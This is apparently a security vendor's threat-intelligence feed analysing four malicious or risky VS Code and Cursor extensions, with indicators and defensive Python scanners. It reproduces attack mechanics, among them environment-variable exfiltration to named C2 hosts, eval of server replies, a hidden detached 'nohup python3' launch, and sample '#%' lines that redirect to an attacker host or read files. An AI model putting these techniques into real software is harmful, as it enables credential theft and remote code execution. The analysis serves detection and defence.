This is an auto-generated feed for suspected dangerous and malicious agentic supply chain findings, from Knostic’s threat intelligence dashboard, AgentMesh, filtered to cover only extension findings.
Dates covered: May 13–20, 2026.

- Note: TeamPCP / Mini Shai-Hulud

Where noted below, certain findings use attack patterns similar to TeamPCP and Mini Shai-Hulud (credentials stolen from the IDE environment, pivoting to cloud infrastructure).
This is a structural similarity. It is absolutely not a confirmed attribution.

- Note 2: Discover and defend your agents

If you like our contributions to the community, check out what we do at Knostic or get Kirin directly (free up to five users).

- Disclaimer: Automated report

This report is for situational awareness only. The information is provided "as-is" without warranty. Knostic and associated staff accept no liability for actions taken based on this intelligence. Verify it manually before taking any action.

Findings Index

| Finding | Type | Marketplace | Installs | Classification | Validated (automated) |
|---|---|---|---|---|---|
| BCAI Rosetta v4.0.37 | VSCode/Cursor extension | OpenVSX | 13,480 | Malicious | Yes — source read |
| KoltinSmith cluster (4 extensions) | VSCode extension | VSCode Marketplace | 0–1 | Malicious | Yes — source read (v1.0.0 only) |
| sunsetHighlight v0.0.2 | VSCode extension | VSCode Marketplace | 0 | Malicious | Yes — source read |
| Musa-DSL v0.1.1 | VSCode extension | VSCode Marketplace | 114 | Dangerous (by design) | Yes — source read |



Finding 1: BCAI Rosetta v4.0.37

Bottom Line

Confirmed malicious (automated - review) after static source validation. The extension steals a Google OAuth refresh token with full Google Cloud Platform (GCP) access. It then uses that token to call Google's AI APIs at the victim's expense.

The code was obfuscated four days before the scan. Pre-obfuscation source files were left in the published VSIX.

13,480 installs on OpenVSX. Active Cursor users are affected.

Validation method: VSIX downloaded from OpenVSX, extracted with unzip, all files read statically. No code was executed.

Basic information

| Field | Value |
|---|---|
| Extension ID | bingcha.bcai-tools |
| Publisher | bingcha |
| Marketplace | OpenVSX (Cursor) |
| Version | 4.0.37 |
| Installs | 13,480 |
| Internal package name | antigravity-rosetta v0.5.0 |
| Source repo (in manifest) | github.com/bingcha135-sys/GFA-per |
| VSIX SHA-256 | b1b9785cdc7be479061f121f282391fba9be013d896d9a54f395621634709216 |
| AgentMesh permalink | https://agentmesh.knostic.ai/extensions/114447 |
| Classification | Malicious |
| Confidence | High |

Simple attack flow

  1. User installs BCAI Rosetta in Cursor. The extension activates on every Cursor startup (activationEvents: ["*"]).
  2. The extension either receives Google credentials from the user, or opens a Google login page itself.
  3. It signs into the user's Google account using an automated browser (AdsPower). If a phone code is required, it buys a temporary number from hero-sms.com.
  4. It runs a Google OAuth flow that requests full GCP access plus four other scopes used by Google's own AI clients.
  5. It saves the resulting refresh token and reads the user's GCP project ID.
  6. A local proxy uses the stolen token to call Google's Gemini Code Assist API on behalf of the user.
  7. The same token can be sent to a remote server at bcai.site, so the attacker can use the user's GCP quota directly.

End result: the attacker gets free AI API access. The user pays the GCP bill.

Confirmed malicious behaviors (automated)

  • Hardcoded OAuth client_id and client_secret in the source. They impersonate Google's own Antigravity IDE client.
  • OAuth scopes requested: cloud-platform (full GCP access), userinfo.email, userinfo.profile, cclog, experimentsandconfigs.
  • Automated Google login through AdsPower, an anti-detect browser tool.
  • Live HeroSMS API key embedded in the source, used to buy SMS-verification phone numbers.
  • Stolen refresh token is used to call Google internal Code Assist endpoints:
    • Hosts: cloudcode-pa.googleapis.com, daily-cloudcode-pa.googleapis.com, daily-cloudcode-pa.sandbox.googleapis.com
    • Paths: /v1internal:loadCodeAssist, /v1internal:onboardUser
  • IDE hijack: the extension overrides the IDE's Cloud Code URL via the jetski.cloudCodeUrl config so AI traffic is routed through the attacker's proxy.
  • Obfuscation evidence: four pre-obfuscation source files dated 2026-05-15 are bundled in the VSIX. javascript-obfuscator is listed in devDependencies.
  • Attacker-side debug path in source: C:\Users\Administrator\Desktop\GFA\logs\screenshots. The GFA name matches the GitHub repo GFA-per.

All behaviors were verified directly in extracted VSIX source files.
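The validation method used for this finding (download the VSIX, unzip it, read every file, execute nothing) is easy to repeat against extensions installed in your own fleet. The block below is an added example written for this page; it is not Knostic's pipeline and not code from any extension discussed here. It opens a VSIX as the zip it is, reads extension/package.json, and flags the traits this finding turns on: a wildcard or startup activation event, javascript-obfuscator in devDependencies, the Google OAuth client ID and GOCSPX- client secret formats, the cloud-platform scope, eval(), hidden terminals and process.env reads. The VSIX it builds in memory is constructed for the example and every secret in it is fake; the regexes are this example's approximations of the formats quoted in the IoC section, not a published ruleset.

```python
"""Static triage of a VSIX (zip) package: read the manifest and sources, execute nothing.

Added example for this page; not Knostic's pipeline and not code from any extension
discussed here. The sample VSIX is constructed in memory with fake secret values.
"""
import io
import json
import re
import zipfile

# Traits from Finding 1 (Google OAuth secrets, cloud-platform scope, wildcard activation,
# obfuscator build) and Findings 2 and 3 (eval, hidden terminal, process.env reads).
# Regexes approximate the formats quoted in the IoC sections; they are this example's own.
PATTERNS = {
    "google_oauth_client_id": re.compile(r"\b\d{10,14}-[a-z0-9]+\.apps\.googleusercontent\.com\b"),
    "google_oauth_client_secret": re.compile(r"\bGOCSPX-[A-Za-z0-9_-]{20,}"),
    "cloud_platform_scope": re.compile(r"auth/cloud-platform\b"),
    "eval_call": re.compile(r"\beval\s*\("),
    "hidden_terminal": re.compile(r"hideFromUser\s*:\s*true"),
    "env_read": re.compile(r"process\.env\b"),
}
RISKY_ACTIVATION = {"*", "onStartupFinished"}
MANIFEST = "extension/package.json"


def triage_vsix(vsix_bytes: bytes) -> dict:
    """Return {'activation': [...], 'obfuscator_in_devdeps': bool, 'hits': {label: [paths]}}."""
    result = {"activation": [], "obfuscator_in_devdeps": False, "hits": {}}
    with zipfile.ZipFile(io.BytesIO(vsix_bytes)) as zf:
        names = zf.namelist()
        if MANIFEST in names:
            manifest = json.loads(zf.read(MANIFEST))
            events = manifest.get("activationEvents", [])
            result["activation"] = [e for e in events if e in RISKY_ACTIVATION]
            result["obfuscator_in_devdeps"] = "javascript-obfuscator" in manifest.get("devDependencies", {})
        for name in names:
            if not name.endswith((".js", ".ts", ".mjs", ".cjs")):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            for label, pattern in PATTERNS.items():
                if pattern.search(text):
                    result["hits"].setdefault(label, []).append(name)
    return result


def risk_score(result: dict) -> int:
    """Crude priority: one point per risky activation event, per hit label, and for the obfuscator."""
    return len(result["activation"]) + len(result["hits"]) + int(result["obfuscator_in_devdeps"])


def build_sample_vsix() -> bytes:
    """Constructed sample with the shape of Finding 1's manifest and Finding 2's poll loop.
    The client ID, client secret and C2 placeholder are fake."""
    manifest = {
        "name": "sample-tools", "publisher": "sample", "version": "0.0.1",
        "activationEvents": ["*"],
        "devDependencies": {"javascript-obfuscator": "^4.0.0"},
    }
    extension_js = (
        'const CLIENT_ID = "1234567890-abcdefghijklmnop.apps.googleusercontent.com";\n'
        'const CLIENT_SECRET = "GOCSPX-FAKEFAKEFAKEFAKEFAKEFAKE";\n'
        'const SCOPES = ["https://www.googleapis.com/auth/cloud-platform"];\n'
        'setInterval(() => fetch(C2 + encodeURIComponent(JSON.stringify(process.env)))\n'
        '  .then(r => r.json()).then(j => { if (j.status === "error") eval(j.message); }), 5000);\n'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(MANIFEST, json.dumps(manifest))
        zf.writestr("extension/out/extension.js", extension_js)
    return buf.getvalue()


if __name__ == "__main__":
    # On a real package: triage_vsix(open("downloaded.vsix", "rb").read())
    report = triage_vsix(build_sample_vsix())
    print(json.dumps(report, indent=2), "score:", risk_score(report))
```

The script only reads; a hit means a human should open the file, not that the extension is malicious. Musa-DSL (Finding 4) would score one point here for its eval() and still be a legitimate, documented design, which is why the output is a triage queue rather than a verdict.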

Confirmed IoCs

Identifiers

  • Extension ID: bingcha.bcai-tools
  • Internal name: antigravity-rosetta v0.5.0
  • GitHub: github.com/bingcha135-sys/GFA-per
  • VSIX SHA-256: b1b9785cdc7be479061f121f282391fba9be013d896d9a54f395621634709216

Hardcoded secrets (redacted in this page)

  • OAuth client_id: 1071006060591-tmhss…REDACTED.apps.googleusercontent.com
  • OAuth client_secret: GOCSPX-K58FW…REDACTED
  • HeroSMS API key: 9d4725…REDACTED

Full values are kept in the internal validation notes and are not safe for external sharing.

Attacker domains

  • bcai[.]site — remote token server (/remote-token) and API proxy (/api/proxy, /api/rosetta)
  • bcai[.]online — legacy OpenAI-compatible relay upstream

Google endpoints abused (with stolen tokens)

  • cloudcode-pa.googleapis[.]com/v1internal:loadCodeAssist
  • daily-cloudcode-pa.googleapis[.]com/v1internal:loadCodeAssist
  • daily-cloudcode-pa.sandbox.googleapis[.]com/v1internal:loadCodeAssist
  • Same hosts, path /v1internal:onboardUser

Network fingerprints

  • User-Agent: antigravity/1.21.6 …
  • Local OAuth callback ports: 19876–19975 on 127.0.0.1
  • Token proxy default port: 60670 (status on 60671)

Third-party service abused

  • hero-sms[.]com/stubs/handler_api.php — temporary phone numbers (service code go, default country Indonesia)

Notes

  • Attack pattern (IDE credential theft → cloud pivot) is structurally similar to TeamPCP and Mini Shai-Hulud. Attribution is not confirmed.

Finding 2: KoltinSmith cluster

Bottom line

Confirmed malicious (automated) after static source validation of KoltinSmith.project-restructure-nodejs v1.0.0. The extension activates automatically when VS Code / Cursor starts. It sends system info and all environment variables to a hardcoded C2 server, then runs any JavaScript the server returns. This is data theft plus remote code execution.

The other three KoltinSmith extensions in the cluster share the same publisher and the same pipeline signatures, but only v1.0.0 was source-read in this validation.

Validation method: VSIX downloaded from the VSCode Marketplace, extracted with unzip. The obfuscated hello-world.js was statically deobfuscated in Python (array-rotation + base64 reproduction). No JavaScript was executed. No network calls to attacker infrastructure.

Basic information

| Field | Value |
|---|---|
| Publisher | KoltinSmith |
| Source-validated extension | KoltinSmith.project-restructure-nodejs v1.0.0 |
| Marketplace | VSCode Marketplace |
| VSIX SHA-256 (v1.0.0) | 366052e4cd801cb4a3fb09376e79288a3d22e820ba21b41d4a07627d8674c6a0 |
| Activation event | onStartupFinished (auto-activates on editor startup) |
| AgentMesh permalink (v1.0.0) | https://agentmesh.knostic.ai/extensions/115139 |
| Classification | Malicious |
| Confidence | High |

All four extensions in the cluster:

| Extension ID | Version | Installs | First seen | Source-read? |
|---|---|---|---|---|
| KoltinSmith.project-restructure-nodejs | 1.0.0 | 0 | 2026-05-20 16:00 | Yes |
| KoltinSmith.hello-world-extension-koltin-smith-test | 0.0.4 | 1 | 2026-05-20 10:00 | No — pipeline + publisher match |
| KoltinSmith.hello-world-extension-koltin-smith | 0.0.2 | 0 | 2026-05-20 01:00 | No — pipeline + publisher match |
| KoltinSmith.hello-world-extension-koltin-smith-test | 0.0.3 | 0 | 2026-05-20 01:00 | No — pipeline + publisher match |

Simple attack flow

  1. User installs the extension. It activates automatically when VS Code / Cursor finishes starting up.
  2. extension.js immediately runs three files: hello-world.js, test.js, and client.js. No user action needed.
  3. hello-world.js builds a snapshot of the victim's machine:
    • hostname
    • one MAC address (first non-internal IPv4 interface)
    • OS type, release, and architecture
    • all environment variables (process.env) — typically including API keys, tokens, cloud credentials
  4. It sends the snapshot to http://45.43.11.211:1224/api/checkStatus as a GET request with query parameters.
  5. If the server responds with JSON where status === "error", the extension runs the message field with eval(). This gives the attacker remote code execution on the user's machine.
  6. The server can also return a sysId, which the extension stores and sends in later calls. This lets the attacker track the same machine across polls.
  7. Steps 3–6 repeat every 5 seconds, forever.

test.js runs a single mouse click at position (500, 300) and restores the cursor. It looks like a development artifact or a one-time trigger.

client.js opens a Socket.io connection to http://localhost:3000. It listens for messages but does nothing with them. This looks like a placeholder for a local relay, not an active control channel in this build.

Confirmed malicious behaviors (source-read)

  • Triple-require activation in extension.js: hello-world.js, test.js, client.js.
  • process.env exfiltrated as a JSON string in the URL query.
  • System info collected: os.hostname(), os.type(), os.release(), os.arch(), and one MAC from os.networkInterfaces().
  • Exact C2 URL recovered by static deobfuscation: http://45.43.11[.]211:1224/api/checkStatus.
  • eval(response.message) runs when response.status === "error".
  • 5-second polling: setInterval(..., 0x1388) = 5,000 ms.
  • Two-layer URL obfuscation:
    1. Custom-alphabet base64 — the alphabet is the standard base64 alphabet with upper and lower case swapped (abcd…ABCD…0123456789+/).
    2. Standard base64 (Buffer.from(_, "base64")).
  • The string "we are going to do big one" is embedded in the obfuscator's wordlist as d2UgYXJlIGdvaW5nIHRvIGRvIGJpZyBvbmU= and is sent as the tid field to the C2.

Confirmed IoCs

Identifiers

  • Publisher: KoltinSmith (VSCode Marketplace)
  • Source-validated extension: KoltinSmith.project-restructure-nodejs v1.0.0
  • VSIX SHA-256: 366052e4cd801cb4a3fb09376e79288a3d22e820ba21b41d4a07627d8674c6a0

C2 infrastructure

  • C2 URL: http://45.43.11[.]211:1224/api/checkStatus
  • Host: 45.43.11[.]211
  • Port: 1224
  • Endpoint: /api/checkStatus
  • Method: GET
  • Query parameters: sysInfo, processInfo, tid, sysId

Behavior signatures

  • Polling interval: 5,000 ms
  • eval trigger: response.status === "error" → eval(response.message)
  • Initial sysId: 0 (server can assign a tracking ID)
  • tid value sent (literal): d2UgYXJlIGdvaW5nIHRvIGRvIGJpZyBvbmU= (base64 of "we are going to do big one")

Dependencies declared

  • @nut-tree-fork/nut-js ^4.2.6 — mouse automation (test.js)
  • socket.io-client ^4.8.3 — Socket.io client (client.js, currently a no-op)

Build / fingerprint quirks

  • extension.js contains a stray dead expression vscode.window. (sloppy build).
  • extension.js shows the popup "Thanks for installing Hello World Extension!" on activation, inconsistent with the marketplace name and description.
  • readme.md content: "This is a simple VS Code extension example." (placeholder).

Notes

  • Source validation in this report covers only KoltinSmith.project-restructure-nodejs v1.0.0. The three other variants share the publisher and pipeline pattern; they are classified malicious by cluster + pipeline match, not by source read.
  • Attack pattern (IDE environment variable theft → credential harvest → RCE) is structurally similar to TeamPCP and Mini Shai-Hulud. Attribution is not confirmed.

Finding 3: sunsetHighlight v0.0.2

Bottom line

Confirmed malicious (automated) after static source validation. The extension is disguised as a "sunset language syntax highlight" tool but is actually a txtx runbook helper with a hidden two-stage backdoor.

When the user opens the Runbooks sidebar, the extension exfiltrates the user's environment to info.txtx-vscode.com. If the C2 server replies status: true, the extension downloads an AES-256-GCM encrypted Python script, decrypts it, writes it to the OS temp folder, and runs it as a detached background process. The Python payload is server-controlled.

Validation method: VSIX downloaded from the VSCode Marketplace, extracted with unzip. The compiled JavaScript in dist/ was read statically. All XOR-encoded strings (URLs, AES algorithm, shell command fragments) were decoded statically in Python. No JavaScript executed. No requests sent to the C2.

Basic information

| Field | Value |
|---|---|
| Extension ID | sunsetHightlight.sunset-highlight (the misspelling "Hightlight" is the actual publisher ID) |
| Publisher | sunsetHightlight |
| Marketplace | VSCode Marketplace |
| Version validated | 0.0.2 |
| Marketplace description | "A sunset language syntax highlight extension" |
| Actual functionality | txtx Runbook helper with hidden backdoor (name/description mismatch) |
| VSIX SHA-256 | 217244bbc47e6cd2d24aff82e670d97bb66711ab4edcca44976c42ff2baa56db |
| Activation events | workspaceContains:txtx.yml, onCommand:txtx.runRunbook, onCommand:txtx.refreshRunbooks |
| C2 host | info.txtx-vscode[.]com |
| AgentMesh permalink | https://agentmesh.knostic.ai/extensions/112221 |
| Classification | Malicious |
| Confidence | High |

Simple attack flow

  1. User opens a workspace that contains a txtx.yml file. The extension activates.
  2. User opens the Runbooks sidebar (txtx Activity Bar view) for the first time in the session.
  3. The extension deliberately throws a fake error with the message "Visibility listener test error (expected)." and catches it. This is to make the next step look like a routine error report.
  4. The catch handler builds a JSON body containing:
    • user_name_hash — actually the plain os.userInfo().username (not hashed)
    • computer_name_hash — actually the plain os.hostname() (not hashed)
    • current_working_directory, workspace_root
    • operating_system_model (platform arch release)
    • extension_version, vscode_version, platform
    • env — all environment variables, base64-encoded
    • timestamp
  5. POSTs the body to https://info.txtx-vscode[.]com/exception_info. Only sent if vscode.env.isTelemetryEnabled is true (VS Code default is on).
  6. If the server responds { status: true }, the extension:
    • GETs an AES-256-GCM encrypted Python script from …/exception_info?type=init
    • GETs the AES key from …/exception_info/key?type=init
    • Decrypts the script in memory
    • Writes the plaintext Python to a temp file: <tmpdir>/txtx-silent-terminal-<timestamp>-<random>.py, mode 0o700
    • Creates a VS Code terminal with hideFromUser: true, isTransient: true
    • Runs: nohup python3 '<tmpfile>' >/dev/null 2>&1 </dev/null &; exit 0
    • nohup + & detach the process — the Python keeps running after the terminal is closed.
  7. A second-stage script (?type=file) is fetched and cached, but the call that would execute it is commented out in this build. The infrastructure is wired; the trigger isn't.

Confirmed malicious behaviors (source-read)

  • Environment-variable exfiltration via getCurrentEnvironmentVariables() in dist/extension.js.
  • C2 host info.txtx-vscode[.]com, recovered by XOR-decoding the base URL byte array (XOR key = 23).
  • AES-256-GCM encrypted second-stage payload (aes-256-gcm, recovered by XOR-decoding the algorithm string in dist/utils.js).
  • Hidden terminal execution via vscode.window.createTerminal({hideFromUser: true, isTransient: true}) in dist/silentTerminalTask.js.
  • Detached background process via nohup python3 … >/dev/null 2>&1 </dev/null &; exit 0 (all four shell-command fragments XOR-encoded with key 23).
  • Disguise: a fake error message "Visibility listener test error (expected)." thrown on purpose.
  • Telemetry gate: only runs when vscode.env.isTelemetryEnabled === true.
  • Cousin extension lookup: source calls vscode.extensions.getExtension("txtx20.sunrise-greeter-demo") — a different publisher / different extension ID with a related theme. Suggests a campaign with multiple cousin extensions.
  • Name / function mismatch: marketplace description says syntax highlighter; code is a txtx runbook with the backdoor bolted on.

Confirmed IoCs

Identifiers

  • Publisher: sunsetHightlight
  • Extension ID: sunsetHightlight.sunset-highlight
  • Version validated: 0.0.2
  • VSIX SHA-256: 217244bbc47e6cd2d24aff82e670d97bb66711ab4edcca44976c42ff2baa56db

C2

  • Host: info.txtx-vscode[.]com
  • Exfil endpoint (POST): https://info.txtx-vscode[.]com/exception_info
  • Encrypted-script endpoint (GET): https://info.txtx-vscode[.]com/exception_info?type=<init|file>
  • AES-key endpoint (GET): https://info.txtx-vscode[.]com/exception_info/key?type=<init|file>
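The network IoCs from Findings 1, 2 and 3 turned into detection logic over proxy logs. The block below is an added example for this page, not Knostic's detection content. classify() parses one line (timestamp, client, method, URL, quoted User-Agent; that layout and the lines themselves are constructed for the example, and real proxies differ), flags the attacker hosts, the KoltinSmith GET whose query string carries processInfo, the txtx exception_info endpoints, and calls to the v1internal Code Assist paths from Finding 1. The antigravity/ User-Agent is only a review signal, since a genuine Antigravity IDE sends the same prefix; the secret name inside the sample processInfo is fake.

```python
"""Network IoCs from Findings 1 to 3 applied to proxy log lines.

Added example for this page, not Knostic's detection content. The line layout
(timestamp client method "url" "user-agent") and the lines themselves are constructed.
"""
import base64
import binascii
import shlex
from urllib.parse import parse_qs, urlsplit

ATTACKER_HOSTS = {"bcai.site", "bcai.online", "info.txtx-vscode.com", "45.43.11.211"}
CODE_ASSIST_HOSTS = {
    "cloudcode-pa.googleapis.com",
    "daily-cloudcode-pa.googleapis.com",
    "daily-cloudcode-pa.sandbox.googleapis.com",
}


def classify(line: str) -> list:
    """Return alert tags for one log line; an empty list means nothing matched."""
    _ts, _client, method, url, user_agent = shlex.split(line)
    parts = urlsplit(url)
    host = parts.hostname or ""
    query = parse_qs(parts.query)
    alerts = []
    if host in ATTACKER_HOSTS:
        alerts.append(f"attacker-host:{host}")
    if host == "45.43.11.211" and parts.path == "/api/checkStatus":
        # Finding 2: the machine snapshot and process.env travel in the GET query string.
        if "processInfo" in query:
            alerts.append("env-exfil:processInfo")
        tid = query.get("tid", [""])[0]
        if tid:
            try:
                alerts.append("tid:" + base64.b64decode(tid, validate=True).decode("ascii"))
            except (binascii.Error, UnicodeDecodeError):
                pass
    if host == "info.txtx-vscode.com" and parts.path.startswith("/exception_info"):
        # Finding 3: POST is the exfil report; GET with ?type= is the encrypted stage or its key.
        suffix = f"?{parts.query}" if parts.query else ""
        alerts.append(f"txtx-backdoor:{method}:{parts.path}{suffix}")
    if host in CODE_ASSIST_HOSTS and parts.path.startswith("/v1internal:"):
        # Finding 1: internal Code Assist paths. Legitimate for a real Antigravity IDE,
        # so this is a review item: check which process and which OAuth client made the call.
        alerts.append("review:v1internal-code-assist")
        if user_agent.startswith("antigravity/"):
            alerts.append("review:antigravity-ua")
    return alerts


# Constructed log lines; the FAKE_CLOUD_KEY name stands in for whatever process.env held.
SAMPLE_LOG = [
    '2026-05-20T10:00:05Z 10.0.0.5 GET "http://45.43.11.211:1224/api/checkStatus'
    '?sysInfo=%7B%22hostname%22%3A%22dev-1%22%7D&processInfo=%7B%22FAKE_CLOUD_KEY%22%3A%22x%22%7D'
    '&tid=d2UgYXJlIGdvaW5nIHRvIGRvIGJpZyBvbmU%3D&sysId=0" "node"',
    '2026-05-20T10:01:00Z 10.0.0.7 POST "https://info.txtx-vscode.com/exception_info" "vscode"',
    '2026-05-20T10:02:00Z 10.0.0.7 GET "https://info.txtx-vscode.com/exception_info?type=init" "vscode"',
    '2026-05-20T10:03:00Z 10.0.0.9 POST "https://cloudcode-pa.googleapis.com/v1internal:loadCodeAssist" "antigravity/1.21.6"',
    '2026-05-20T10:04:00Z 10.0.0.9 GET "https://marketplace.visualstudio.com/items?itemName=example" "vscode"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line) or "-", "<-", line[:60])
```

Two of the indicators deserve a caveat. The KoltinSmith C2 is plain HTTP on a non-standard port, so the query string (and therefore the victim's environment) is visible to any proxy or IDS in the path; the txtx exfil is HTTPS, so there the matchable fact is the host, not the body.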

Payload mechanism

  • Encryption: aes-256-gcm with scrypt KDF (32-byte key, 12-byte IV, 16-byte salt)
  • Temp file pattern: <tmpdir>/txtx-silent-terminal-<ts>-<rand>.py, mode 0o700
  • Shell template: nohup python3 '<tmpfile>' >/dev/null 2>&1 </dev/null &; exit 0

Disguise

  • Thrown error message: Visibility listener test error (expected).
  • Reported event name: visibility_test_exception
  • Field names user_name_hash and computer_name_hash carry unhashed values.

Campaign linkage

  • Cousin extension referenced in source: txtx20.sunrise-greeter-demo (publisher txtx20).
  • Likely target audience: developers using txtx (Solana / SVM ecosystem).

Obfuscation

  • XOR key 23 (0x17) hides the C2 URL, the AES algorithm string, and the four shell-command fragments.
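Recovering the XOR layer is the part of this validation worth repeating on the next sample, so here it is as an added example for this page; it is neither Knostic's script nor the extension's code. The scanner pulls numeric byte-array literals out of JavaScript text, brute-forces a single-byte key against known plaintext prefixes (https://, aes-, nohup), and then decodes every array with the key it recovers. The JavaScript sample is constructed by XOR-ing the strings quoted in this finding with 23; the way the shell template is split into fragments is made up for the example, and the AES-256-GCM stage is not reproduced because its key comes from the server.

```python
"""Recovering single-byte XOR strings like those in sunsetHighlight's dist/ bundle.

Added example for this page; not Knostic's script and not the extension's code.
The JavaScript sample is constructed by XOR-ing strings quoted in the finding with 23.
"""
import re

KNOWN_PREFIXES = (b"https://", b"http://", b"aes-", b"nohup ")
# Array literals of at least four 1-3 digit integers, e.g. [127, 99, 99, ...]
ARRAY_RE = re.compile(r"\[\s*(\d{1,3}(?:\s*,\s*\d{1,3}){3,})\s*\]")


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def find_byte_arrays(js_text: str) -> list:
    """Numeric array literals whose values all fit in a byte, in source order."""
    arrays = []
    for m in ARRAY_RE.finditer(js_text):
        values = [int(v) for v in re.split(r"\s*,\s*", m.group(1))]
        if all(v < 256 for v in values):
            arrays.append(bytes(values))
    return arrays


def recover_key(encoded: bytes, prefixes=KNOWN_PREFIXES):
    """Known-plaintext search over all 256 single-byte keys; None if no prefix matches."""
    for key in range(256):
        if xor_bytes(encoded, key).startswith(prefixes):
            return key
    return None


def scan_js(js_text: str):
    """Recover the key from the first array that decodes to a known prefix, then decode all
    arrays with it. Returns (key, decoded_strings); arrays that are not text decode to junk."""
    arrays = find_byte_arrays(js_text)
    for arr in arrays:
        key = recover_key(arr)
        if key is not None:
            return key, [xor_bytes(a, key).decode("latin-1") for a in arrays]
    return None, []


# Constructed sample bundle fragment. The fragment boundaries are invented for the example.
KEY = 23
FRAGMENTS = (
    "https://info.txtx-vscode.com",
    "aes-256-gcm",
    "nohup python3 '",
    "' >/dev/null 2>&1 </dev/null &; exit 0",
)


def build_sample_js() -> str:
    parts = [
        f"const s{i}=[{','.join(str(b) for b in xor_bytes(s.encode('ascii'), KEY))}];"
        for i, s in enumerate(FRAGMENTS)
    ]
    parts.append("const rgb=[12,34,56,78];")  # unrelated array: decodes to junk, recovers no key
    return "\n".join(parts)


if __name__ == "__main__":
    key, strings = scan_js(build_sample_js())
    print("key:", key)
    for s in strings:
        print(repr(s))
```

On the real bundle the same approach stops working for the second stage: the Python script is AES-256-GCM encrypted with a server-supplied key, so static analysis ends at the fetch URL, the algorithm string and the temp-file and shell templates, which is exactly the boundary the validation above reports.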

Notes

  • Attack pattern (IDE-side telemetry-style report → server-decided second-stage execution → encrypted Python payload) is more sophisticated than the KoltinSmith family. Structural similarity to TeamPCP is partial; attribution is not confirmed.

Finding 4: Musa-DSL Live Coding Environment v0.1.1

Bottom line

Not malicious. Dangerous by design. The extension is a legitimate live-coding REPL client for Musa-DSL, a Ruby music-composition DSL. It is published with full TypeScript source and a documented design.

The #% + eval() pattern flagged by the pipeline is an intentional internal-commands mechanism, documented in the extension's own README. The risk is real but conditional: a user can be tricked into running attacker JavaScript by evaluating a #%-prefixed line from a hostile workspace. It is not a drive-by attack on install.

No outbound network beyond a local TCP connection to localhost:1327. No environment-variable exfil. No obfuscation. No hidden execution. No persistence.

Validation method: VSIX downloaded from the VSCode Marketplace, extracted with unzip. Both compiled out/*.js and TypeScript sources src/*.ts were read statically. No JavaScript executed.

Basic information

| Field | Value |
|---|---|
| Extension ID | javier-sy.musa-lce-client-for-vscode |
| Publisher | javier-sy (Javier Sánchez Yeste) |
| Marketplace | VSCode Marketplace |
| Version validated | 0.1.1 |
| Installs | 114 |
| License | GPL-3.0 |
| GitHub (in manifest) | https://github[.]com/javier-sy/MusaLCEClientForVSCode |
| VSIX SHA-256 | 25b6612ac1dab3131f52b8a99a21163ce5cdb5de0698a027758610288b2a12f7 |
| Default REPL target | localhost:1327 |
| AgentMesh permalink | https://agentmesh.knostic.ai/extensions/113349 |
| Validation status | Source-validated |
| Classification | Dangerous (by design) |
| Confidence | High |

What the extension actually does

  1. On activation, opens a TCP socket to localhost:1327 (Musa REPL server).
  2. Provides two commands and two keybindings:
    • Ctrl+Alt+Enter (MusaLCE: send) — sends the current selection (or the current line if there is no selection) to the REPL.
    • Ctrl+Alt+M (MusaLCE: toggle results) — shows / hides the MusaLCE output channel.
    On send, if the text starts with #% it runs eval(`commands.${text.substring(2)}`) — the internal-commands path (see below). Otherwise it writes the text to the local TCP socket with #path / #begin / message / #end framing.
  3. Receives REPL responses over the same socket and writes them to a VS Code output channel.

That is the full surface area. No background tasks, no file system access beyond reading the user's open document, no network beyond localhost:1327.

Why "Dangerous"

The Commands class has only two intended methods: host(host, port) (change the REPL host/port) and clear() (clear the output panel). But because eval() runs in the JavaScript lexical scope, a user who pastes any line starting with #% and presses Ctrl+Alt+Enter on that line will run that JavaScript inside the extension host.

Practical risks if a user is tricked into evaluating attacker-supplied #% lines:

  • #%host("attacker.example[.]com", 80) — redirects subsequent Send calls to an attacker's TCP server.
  • #%clear(); require("fs").readFileSync("…") — arbitrary file read. The leading clear() only satisfies the commands. prefix the template prepends; after the semicolon the rest of the line runs in the extension host's module scope, where require is available.

This requires all of:

  1. The extension is installed.
  2. The user opens an attacker-supplied workspace / file.
  3. The user places the cursor on the #%-prefixed line.
  4. The user presses Ctrl+Alt+Enter.

Not automatic. Comparable to "pasting unknown code into a REPL".

The author documents this

From the README, "Internal commands" section:

Selections beginning with #% are treated as internal extension commands rather than Ruby code: they are eval-ed against the extension's commands object and never reach the server. These are intended for advanced/diagnostic use and are not part of the user-facing API. Avoid lines starting with #% in production scores.

Confirmed by source read (this is NOT malware)

  • TypeScript source ships in the VSIX (src/*.ts). Compiled out/*.js matches src/*.ts.
  • Author identity is consistent across a public music-tooling portfolio: musa-dsl, musalce-server, MusaLCEforBitwig, MusaLCEforLive.
  • Only network destination: localhost:1327 (default in src/connection.ts).
  • Searched src/ and out/: no https/fetch/axios/child_process/exec/spawn, no hidden terminals (hideFromUser/isTransient), no process.env reads/sends, no writeFileSync to temp/home, no crypto, AES, XOR, or base64-blob obfuscation.
  • The Commands class has exactly two methods: host and clear.

IoCs (informational — not malware)

  • Extension ID: javier-sy.musa-lce-client-for-vscode
  • Publisher: javier-sy
  • VSIX SHA-256: 25b6612ac1dab3131f52b8a99a21163ce5cdb5de0698a027758610288b2a12f7
  • GitHub: https://github[.]com/javier-sy/MusaLCEClientForVSCode
  • Default TCP target: localhost:1327
  • Risky (but documented) pattern: #% prefix + eval(`commands.${rest}`) in src/extension.ts / out/extension.js.

Notes

  • Not part of the BCAI / KoltinSmith / sunsetHighlight family. Different threat model, different ecosystem (music tooling, GPL, public author).

Last updated: 2026-05-20. Source: AgentMesh feed (#agentmesh-findings, C0APG6Z3BRV).


